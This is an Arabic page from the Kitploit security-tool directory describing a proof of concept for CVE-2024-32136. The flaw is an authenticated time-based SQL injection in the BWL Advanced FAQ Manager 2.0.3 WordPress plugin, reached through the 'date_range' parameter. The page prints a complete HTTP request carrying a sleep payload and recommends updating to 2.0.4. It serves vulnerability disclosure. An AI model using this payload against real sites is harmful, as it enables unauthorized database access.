Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-32136 — إثبات المفهوم لاستغلال CVE-2024-32136، وهو حقن SQL بعد تسجيل الدخول في BWL Advanced FAQ Manager 2.0.3، يوضح التلاعب بقاعدة البيانات عبر الزمن باستخدام الوسيط 'date_range'. | Kitploit
أدوات/GitHubGitHub/xbz0n/cve-2024-32136
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubxbz0n/cve-2024-32136

CVE-2024-32136

إثبات المفهوم لاستغلال CVE-2024-32136، وهو حقن SQL بعد تسجيل الدخول في BWL Advanced FAQ Manager 2.0.3، يوضح التلاعب بقاعدة البيانات عبر الزمن باستخدام الوسيط 'date_range'.

عرض المستودع
3منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

BWL Advanced FAQ Manager 2.0.3 - حقن SQL بعد المصادقة

عنوان الثغرة: BWL Advanced FAQ Manager 2.0.3 - حقن SQL بعد المصادقة
التاريخ: 14 أبريل 2024
مؤلف الثغرة: Ivan Spiridonov (xbz0n)
رابط البرنامج: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135
الإصدار: 2.0.3
تم الاختبار على: Ubuntu 20.04
CVE: CVE-2024-32136

حقن SQL

حقن SQL هو نوع من الثغرات الأمنية التي تسمح للمهاجم بالتدخل في استعلامات قاعدة بيانات التطبيق. عادةً ما يتضمن إدراج أو "حقن" استعلام SQL عبر بيانات الإدخال من العميل إلى التطبيق. يمكن لاستغلال ناجح لحقن SQL قراءة بيانات حساسة من قاعدة البيانات، وتعديل بيانات قاعدة البيانات (إدراج/تحديث/حذف)، وتنفيذ عمليات إدارية على قاعدة البيانات (مثل إيقاف تشغيل نظام إدارة قواعد البيانات)، واستعادة محتوى ملف معين موجود على نظام ملفات DBMS، وفي بعض الحالات، إصدار أوامر لنظام التشغيل.

المكونات المتأثرة

  • الملحق: BWL Advanced FAQ Manager
  • الإصدار: 2.0.3
  • المعامل المتأثر: 'date_range'
  • الصفحة المتأثرة: /wp-admin/edit.php

الوصف

توجد الثغرة داخل المعامل 'date_range' المستخدم في صفحة 'bwl-advanced-faq-analytics' من ملحق BWL Advanced FAQ Manager. يمكن للمهاجمين الموثقين تنفيذ أوامر SQL عشوائية داخل قاعدة البيانات عن طريق معالجة الإدخال لهذا المعامل.

إثبات المفهوم

الاستغلال اليدوي

يُظهر طلب GET التالي الثغرة:

root@kitploit:~
GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics
Connection: close
Cookie: [ملفات تعريف الارتباط ذات الصلة]
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

إذا تأخر استجابة الخادم لمدة 20 ثانية تقريبًا، فهذا يشير إلى استغلال ناجح لحقن SQL الزمني، مما يؤكد وجود الثغرة.

التوصيات

يُنصح مستخدمو BWL Advanced FAQ Manager v2.0.3 بتحديث الملحق إلى الإصدار المُصحح v2.0.4.

تنزيل الأداة